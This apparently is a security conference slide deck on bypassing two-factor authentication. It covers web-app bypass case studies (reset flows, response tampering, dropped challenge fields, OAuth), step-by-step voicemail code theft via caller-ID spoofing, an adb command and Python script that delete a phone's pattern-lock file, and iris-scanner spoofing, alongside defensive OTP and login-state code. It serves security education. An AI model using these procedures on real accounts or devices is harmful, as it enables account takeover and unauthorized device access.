Shahmeer Amir
Bypassing two-factor authentication using the simplest methods.
CEO @ Veiliux
Bypassing Multi Factor Authentication
WHO AM I?
• Penetration Tester and Founder @ Veiliux
• Cyber Security researcher
• Leisurely Bug Bounty Hunter
• M.Sc Security Science
• Pursuing Ph.D in Information Security
AGENDA
• What is 2FA
• Conventional 2FA implementations in web applications
• Methods of bypassing 2FA in web apps
• Methods of bypassing MFA on mobile phones
• A foreword on Face ID
2FA, WHAT IS IT?
Two-factor authentication requires a second, independent factor in addition to the password, most commonly something the user has: a handheld device that receives or generates a one-time code, which the online portal checks before it grants a session.
IS 2FA SECURE?
Most organizations treat it as a secure means of authenticating users into their portals, yet there are several methods by which two-factor authentication can be bypassed. Most of them exploit the implementation around the second factor (reset flows, client-side checks, alternative login paths, code delivery) rather than the factor itself.
SEVERAL 2FA IMPLEMENTATIONS
• SMS
• 3rd party software (authenticator apps)
2FA WORKFLOW
TYPES OF 2FA TOKENS
There are three OATH OTP types that are the most widely used:
• Event-based tokens (HOTP, RFC 4226)
• Time-based tokens (TOTP, RFC 6238)
• Challenge-based tokens (OCRA, RFC 6287)
EVENT BASED TOKEN
An OTP system generates event-based tokens on demand from a static random key (the shared secret) combined with a counter that is incremented on every use, so the same code is never issued twice and the server has to track the last counter it accepted.
TIME BASED TOKEN
An OTP system generates time-based tokens automatically at a fixed interval (typically 30 seconds) from the static random key and a dynamic time value, the current time step.
CHALLENGE BASED TOKEN
An OTP system generates challenge-based tokens on demand from the static key and a random challenge that the authentication server provides at each unique user log-in, which ties the code to that specific login attempt.
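The event-based and time-based mechanisms above, worked through in code. This is an added example written for this page, not code from the talk or from any OATH reference implementation: it builds HOTP (RFC 4226) and TOTP (RFC 6238) from Python's standard library and adds a small server-side verifier, OtpVerifier, which is my own construction showing the two things the verifying side has to get right, a bounded look-ahead window and refusing any counter or time step that was already accepted, so an intercepted code cannot be replayed. The secret and timestamps are the published RFC test vectors; the window sizes are assumptions. Challenge-based (OCRA) codes are not implemented.

```python
import hashlib
import hmac
import struct

# The 20-byte seed used by the RFC 4226 / RFC 6238 test vectors.
SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC(secret, counter) -> dynamic truncation -> decimal code.

    The counter is the 'event' of an event-based token: the client increments
    it on every code it generates, the server on every code it accepts.
    """
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                      # low nibble of the last byte
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6,
         algo=hashlib.sha1) -> str:
    """RFC 6238 TOTP is HOTP with the counter replaced by the time step."""
    return hotp(secret, unix_time // step, digits, algo)


class OtpVerifier:
    """Server side of the check (assumed design, not from the talk).

    The only state is the last counter or time step that was accepted; a code
    for that or any earlier value is refused, which is what stops a code that
    was intercepted (or read from voicemail) from being replayed.
    """

    def __init__(self, secret: bytes, digits: int = 6):
        self.secret = secret
        self.digits = digits
        self.last_accepted = -1

    def _accept(self, code: str, candidates) -> bool:
        for c in candidates:
            if c <= self.last_accepted:
                continue                          # already consumed
            if hmac.compare_digest(hotp(self.secret, c, self.digits), code):
                self.last_accepted = c            # burn this counter / step
                return True
        return False

    def verify_hotp(self, code: str, look_ahead: int = 5) -> bool:
        """Event-based: the token may have been pressed a few times without a
        code being submitted, so search a small window after the last counter."""
        start = self.last_accepted + 1
        return self._accept(code, range(start, start + look_ahead))

    def verify_totp(self, code: str, now: int, step: int = 30, skew: int = 1) -> bool:
        """Time-based: tolerate `skew` steps of clock drift either side of now,
        but never accept a step that has already been consumed."""
        t = now // step
        return self._accept(code, range(t - skew, t + skew + 1))


if __name__ == "__main__":
    v = OtpVerifier(SECRET)
    first = hotp(SECRET, 0)
    print(first, v.verify_hotp(first), v.verify_hotp(first))   # second use is refused
    print(totp(SECRET, 59, digits=8))                           # RFC 6238 vector
```

The verifier deliberately has no "accept any recent code" mode: the window is bounded, every accepted value is recorded, and comparison uses hmac.compare_digest so the check is constant-time.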
BYPASSING 2FA IN WEB APPS
• Bypassing 2FA in Mapbox (session management)
• Bypassing 2FA in an e-wallet (response manipulation)
• Bypassing 2FA in PayPal ("Try another way")
• Bypassing 2FA in Recurly (universal OAuth bug)
• Bypassing 2FA via exploiting voicemail
RECURLY 2FA BYPASS
Cause of vulnerability: automatic login of users after a password change. The reset flow grants a full session on the strength of the reset token alone, so the 2FA check that guards the normal login page is never reached.
Normal flow:
• User requires a password change
• User requests a password reset token
• User changes the password via the token
• Application logs the user in automatically after the change
RECURLY 2FA BYPASS (Cont.d)
Process flow:
• Attacker has the victim's credentials
• Attacker logs in and is faced with the 2FA page
• Attacker requests a password reset token (the attacker must be able to obtain the token, e.g. from the victim's mailbox)
• Attacker changes the password and is logged in, without ever answering the 2FA challenge
RECURLY 2FA BYPASS (Cont.d)
Abusive scenario
RECURLY 2FA BYPASS (Cont.d)
E-WALLET 2FA BYPASS
Cause of vulnerability: the outcome of the OTP check is enforced on the client, from the server's response, rather than on the server, so later requests are not gated on a second factor that the server has verified.
E-WALLET 2FA BYPASS
Complete takeover of an account using response manipulation:
• Attacker logs into the account with the victim's credentials
• Attacker submits an incorrect verification code
• Attacker intercepts the response with Burp Suite Proxy
• Attacker changes the response status and the corresponding body to 200 OK with the success payload, and the client proceeds as if the code had been correct
E-WALLET 2FA BYPASS
Abusive scenario:
PAYPAL 2FA BYPASS
• Cause of vulnerability: secret-question request manipulation
PAYPAL 2FA BYPASS
Process flow:
• Attacker logs into the account
• Attacker selects the alternative login option ("Try another way", security questions)
• Attacker enters incorrect answers
• Attacker intercepts the request with Burp Suite
• Attacker removes the "challenge" and "response" fields from the request
• Attacker is granted access: the server fails open when the fields it expects are absent, instead of rejecting the request
PAYPAL 2FA BYPASS
Abusive scenario:
RELATEIQ 2FA BYPASS
• Cause of vulnerability: OAuth manipulation
RELATEIQ 2FA BYPASS
Bypassing 2FA via OAuth:
• Attacker compromises the user's Facebook account
• Attacker clicks "Login via Facebook"
• Attacker is granted access to the victim's account: the social-login path is linked to the same account but is not gated by that account's 2FA setting
RELATEIQ 2FA BYPASS
Abusive Scenario:
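The four web bypasses above (Recurly, e-wallet, PayPal, RelateIQ) share one root cause: some path into the account reaches a logged-in state without passing through a second-factor check that the server itself records. The following is an added example, not code from the talk or from any of the services named: a minimal in-memory login state machine in which every first factor, whether password, password-reset token or social login, can only reach PENDING_2FA; the second-factor check is the single place that moves a session to AUTHENTICATED; and a request with missing challenge fields fails closed. The user record, the Facebook identifier, the security-question answers and the attempt limit are constructed for the demo.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Dict, Optional


class State(Enum):
    ANONYMOUS = "anonymous"
    PENDING_2FA = "pending_2fa"      # first factor done, second factor still owed
    AUTHENTICATED = "authenticated"  # both factors verified on the server


@dataclass
class Session:
    user: Optional[str] = None
    state: State = State.ANONYMOUS
    attempts: int = 0


@dataclass
class User:
    password: str                    # plaintext only to keep the demo short (ASCII)
    otp: str                         # the code the user's device currently shows
    answers: Dict[str, str] = field(default_factory=dict)   # security questions
    facebook_id: Optional[str] = None
    mfa_enabled: bool = True


class AuthServer:
    MAX_ATTEMPTS = 5   # assumed brute-force limit on the second factor

    def __init__(self, users: Dict[str, User]):
        self.users = users
        self.reset_tokens: Dict[str, str] = {}

    # Every first factor, whatever the path, ends here and never above PENDING_2FA.
    def _first_factor_ok(self, sess: Session, username: str) -> State:
        sess.user, sess.attempts = username, 0
        mfa = self.users[username].mfa_enabled
        sess.state = State.PENDING_2FA if mfa else State.AUTHENTICATED
        return sess.state

    def login_password(self, sess: Session, username: str, password: str) -> State:
        u = self.users.get(username)
        if u is None or not hmac.compare_digest(u.password, password):
            return State.ANONYMOUS
        return self._first_factor_ok(sess, username)

    def request_password_reset(self, username: str) -> str:
        token = secrets.token_urlsafe(16)
        self.reset_tokens[token] = username
        return token   # a real service e-mails this; returned here only for the demo

    def reset_password(self, sess: Session, token: str, new_password: str) -> State:
        # Recurly pattern: a reset token proves control of the mailbox, i.e. one
        # factor, so it leads to the 2FA page, not to a logged-in session.
        username = self.reset_tokens.pop(token, None)   # single use
        if username is None:
            return State.ANONYMOUS
        self.users[username].password = new_password
        return self._first_factor_ok(sess, username)

    def login_oauth(self, sess: Session, facebook_id: str) -> State:
        # RelateIQ pattern: "Login via Facebook" is a first factor for the linked
        # account, so the account's own 2FA still applies.
        for name, u in self.users.items():
            if u.facebook_id == facebook_id:
                return self._first_factor_ok(sess, name)
        return State.ANONYMOUS

    # The single second-factor gate. The decision is made and stored on the server.
    def _second_factor(self, sess: Session, check: Callable[[User], bool]) -> State:
        if sess.state is not State.PENDING_2FA:
            return sess.state
        sess.attempts += 1
        if sess.attempts > self.MAX_ATTEMPTS:          # too many tries: drop the session
            sess.state, sess.user = State.ANONYMOUS, None
        elif check(self.users[sess.user]):
            sess.state = State.AUTHENTICATED
        return sess.state

    def verify_otp(self, sess: Session, code: str) -> State:
        return self._second_factor(sess, lambda u: hmac.compare_digest(u.otp, code))

    def verify_security_questions(self, sess: Session, answers: Dict[str, str]) -> State:
        # PayPal pattern: the request must carry exactly the expected challenge /
        # response fields; a missing field is a failed check, not a skipped one.
        def ok(u: User) -> bool:
            if set(answers) != set(u.answers):
                return False
            return all(hmac.compare_digest(u.answers[q], answers[q]) for q in u.answers)
        return self._second_factor(sess, ok)

    def get_balance(self, sess: Session) -> str:
        # E-wallet pattern: authorization is read from server-side session state, so
        # a client that rewrites a failed OTP response into "200 OK" still gets nothing.
        if sess.state is not State.AUTHENTICATED:
            raise PermissionError("second factor required")
        return "balance for " + sess.user
```

The point of the structure is that there is exactly one transition into AUTHENTICATED and it lives in _second_factor; a reviewer checking a real application for these four bugs is looking for any other code path that sets the equivalent flag.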
BYPASSING 2FA VIA VOICEMAIL
Cause of vulnerability: exploiting voicemail. The 2FA code is delivered by a phone call; when the line is busy the call, and with it the code, lands in voicemail, and the voicemail box can be reached by anyone who can present the victim's caller ID.
BYPASSING 2FA VIA VOICEMAIL
What happens to the user:
• User logs in
• User requests the 2FA code via a call
• User gets a call from someone else at the same time
• User's 2FA code is sent to voicemail
Process flow:
• Attacker logs into the victim's account
• Attacker places a call to the victim's phone number
• Attacker chooses the "2FA code via phone call" option
• Because the victim is busy on the attacker's call, the 2FA calling service immediately sends the 2FA code to the victim's voicemail
• Attacker retrieves the code from the voicemail box (see the steps below)
BYPASSING 2FA VIA VOICEMAIL
Abusive scenario:
EXPLOITING VOICEMAIL
Step 1: Obtain an ANI / caller ID spoofing service, either via a VoIP provider or via a dedicated spoofing provider.
Step 2: For all the services in the Australian region, enter the destination number as +610411000321.
Step 3: Enter the "Caller ID to Display" as the victim's mobile number.
Step 4: If you are using SpoofCard, a number and an access code are displayed. Call this number and input the access code.
Step 5: You will be connected to the victim's voicemail service provider's endpoint. Input the victim's mobile number and press #.
This works only where the voicemail system authenticates the caller by the presented caller ID alone; a mailbox that requires a PIN stops the retrieval at step 5.
EXPLANATION FOR USING THE VM NUMBER
• All resellers use the exact same core services as Optus does.
• The primary number to call for voicemail is "321".
• When spoofing, we need the remote number to call, as "321" cannot be reached from outside the carrier's network.
• Australian cellular providers provide a remote number to call in case customers are overseas. This number is +610411000321.
2FA BYPASS IN MOBILE PHONES
• Bypassing pattern lock via ADB
• Bypassing S8 Iris scanner
BYPASSING PATTERN LOCK USING ADB
This option only works when USB debugging was enabled on the device beforehand and the PC has already been authorized to connect over ADB. If those requirements are met, this is the simplest way to unlock a Samsung lock screen.
How to:
• Connect the device to the PC with a USB cable and open a command prompt in the ADB directory.
• Type the command "adb shell rm /data/system/gesture.key", press Enter, then reboot the device.
Two caveats a tester should check first: /data/system is not writable by the unprivileged adb shell user, so the adb shell must be running as root; and the pattern hash lives in gesture.key only on Android 4.4 and earlier. Android 5.0 and later store it elsewhere, so deleting the file does nothing there.
BYPASSING PATTERN LOCK USING ADB
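Before running the command above against a test device, two preconditions decide whether it can work at all. The following is an added example, not from the talk: it checks, from the output of adb shell id and the device's API level, whether the adb shell is root and whether the pattern is still stored in gesture.key, and only then issues the rm and the reboot. The adb invocations assume the adb binary is on PATH; the check functions take the command output as plain strings so they can be exercised without a device.

```python
import re
import subprocess
from typing import Optional, Tuple

GESTURE_KEY = "/data/system/gesture.key"


def shell_is_root(id_output: str) -> bool:
    """True when the output of `adb shell id` shows uid 0.

    The unprivileged adb 'shell' user (uid 2000) cannot unlink files in
    /data/system, so without root the rm in the slide silently fails."""
    return re.match(r"\s*uid=0\(", id_output) is not None


def pattern_file_for_sdk(sdk: int) -> Optional[str]:
    """Where the pattern is stored for a given API level.

    gesture.key (a hash of the pattern) was used up to Android 4.4 (API 20);
    Lollipop (API 21) and later moved to gatekeeper-backed storage, so deleting
    gesture.key does nothing there."""
    return GESTURE_KEY if sdk <= 20 else None


def can_remove_gesture_key(id_output: str, sdk_output: str) -> Tuple[bool, str]:
    """Combine both checks; returns (ok, reason)."""
    try:
        sdk = int(sdk_output.strip())
    except ValueError:
        return False, "could not read ro.build.version.sdk: %r" % sdk_output
    if pattern_file_for_sdk(sdk) is None:
        return False, "API level %d does not store the pattern in gesture.key" % sdk
    if not shell_is_root(id_output):
        return False, "adb shell is not root (%s); /data/system is not writable" % id_output.strip()
    return True, "ok"


def adb(*args: str) -> str:
    """Run one adb command and return its trimmed stdout (assumes adb on PATH)."""
    done = subprocess.run(["adb", *args], capture_output=True, text=True, check=True)
    return done.stdout.strip()


def unlock_pattern() -> bool:
    """Run the checks against the attached device, then the step from the slide."""
    ok, reason = can_remove_gesture_key(adb("shell", "id"),
                                        adb("shell", "getprop", "ro.build.version.sdk"))
    print(reason)
    if not ok:
        return False
    adb("shell", "rm", GESTURE_KEY)
    adb("reboot")
    return True


if __name__ == "__main__":
    unlock_pattern()
```

On a production build adb shell id normally reports uid=2000(shell); getting uid 0 needs an engineering or userdebug build (adb root) or an already rooted device, which is why this method rarely works on a stock handset.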
BYPASSING THE IRIS SCANNER IN THE S8
• Take a photo of the owner's eye
• Lens: 200 mm
• Distance: 15 mm
• Print: high-quality colour copy
• Lay a wet contact lens over the printed eye, hold it up to the scanner, and the phone unlocks
Given enough time, physical access to the phone and a usable photo of the owner's eye, you could in theory unlock any Galaxy S8 that has iris scanning enabled.
LET'S SEE HOW IT IS DONE
FACE ID, LET'S TALK
SO, HOW CAN IT BE HACKED?
The Secure Enclave Processor
The data captured by Face ID (Apple describes it as a mathematical representation of the face rather than the images themselves) is kept in the encrypted memory of Apple's dedicated coprocessor, the Secure Enclave Processor.
SEP, WHAT IS IT?
• A security circuit designed to perform secure services for the rest of the SoC
• The SEP has its own set of peripherals, accessible by memory-mapped I/O
• Dedicated I/O lines
• Runs its own operating system (SEPOS)
"Bypassing two factor authentication", Shahmeer Amir
THE FUTURE OF FACE ID IS BASED ON THE SEP
• SEPOS lacks basic exploit mitigations, e.g. no memory layout randomization
• The shared PMGR and PLL are open to attack
• The inclusion of the fuse source pin should be re-evaluated
• The demotion functionality appears rather dangerous
QUESTIONS?

Weitere ähnliche Inhalte

Ähnlich wie "Bypassing two factor authentication", Shahmeer Amir

FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO Alliance
 
Seminar-Two Factor Authentication
Seminar-Two Factor AuthenticationSeminar-Two Factor Authentication
Seminar-Two Factor AuthenticationDilip Kr. Jangir
 
FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO Alliance
 
Revolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectRevolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectKeet Sugathadasa
 
FIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO Alliance
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Alliance
 
Audio card - VoIP - Phonecard
Audio card - VoIP - PhonecardAudio card - VoIP - Phonecard
Audio card - VoIP - PhonecardGuy Romanus
 
FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO Alliance
 
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 Webinar: Beyond Two-Factor: Secure Access Control for Office 365 Webinar: Beyond Two-Factor: Secure Access Control for Office 365
Webinar: Beyond Two-Factor: Secure Access Control for Office 365SecureAuth
 
SOTP_Introduction
SOTP_IntroductionSOTP_Introduction
SOTP_IntroductionJohnson Wu
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdfRavi Aggarwal
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxVladVlad504281
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxFIDO Alliance
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CloudIDSummit
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goMichael Furman
 

Ähnlich wie "Bypassing two factor authentication", Shahmeer Amir (20)

FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and Insights
 
Passwordless Mobile Banking.pdf
Passwordless Mobile Banking.pdfPasswordless Mobile Banking.pdf
Passwordless Mobile Banking.pdf
 
Seminar-Two Factor Authentication
Seminar-Two Factor AuthenticationSeminar-Two Factor Authentication
Seminar-Two Factor Authentication
 
FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial
 
Revolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectRevolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connect
 
FIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO U2F & UAF Tutorial
FIDO U2F & UAF Tutorial
 
WSO2 Telco MCX
WSO2 Telco MCXWSO2 Telco MCX
WSO2 Telco MCX
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcit
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2F
 
Audio card - VoIP - Phonecard
Audio card - VoIP - PhonecardAudio card - VoIP - Phonecard
Audio card - VoIP - Phonecard
 
FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and Insights
 
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 Webinar: Beyond Two-Factor: Secure Access Control for Office 365 Webinar: Beyond Two-Factor: Secure Access Control for Office 365
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 
SOTP_Introduction
SOTP_IntroductionSOTP_Introduction
SOTP_Introduction
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptx
 
BIOMETRYsso
BIOMETRYssoBIOMETRYsso
BIOMETRYsso
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F Paradox
 
FIDOAlliance
FIDOAllianceFIDOAlliance
FIDOAlliance
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to go
 

Mehr von HackIT Ukraine

"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен..."CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен...HackIT Ukraine
 
"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей ГолубевHackIT Ukraine
 
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир ОбризанHackIT Ukraine
 
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий КайдаловHackIT Ukraine
 
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей КаракуловHackIT Ukraine
 
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим МирошниченкоHackIT Ukraine
 
"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий ГадомскийHackIT Ukraine
 
"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii BaranovskyiHackIT Ukraine
 
"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр ЧубарукHackIT Ukraine
 
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii LukinHackIT Ukraine
 
"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro BudorinHackIT Ukraine
 
"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander AdamovHackIT Ukraine
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...HackIT Ukraine
 
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ..."Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...HackIT Ukraine
 
"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser Ali"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser AliHackIT Ukraine
 
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo..."Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...HackIT Ukraine
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...HackIT Ukraine
 
Владимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesВладимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesHackIT Ukraine
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 

Mehr von HackIT Ukraine (20)

"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен..."CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
 
"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев
 
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
 
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
 
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
 
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
 
"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский
 
"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi
 
"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук
 
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
 
"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin
 
"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
 
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ..."Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
 
"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser Ali"Introduction to Bug Hunting", Yasser Ali
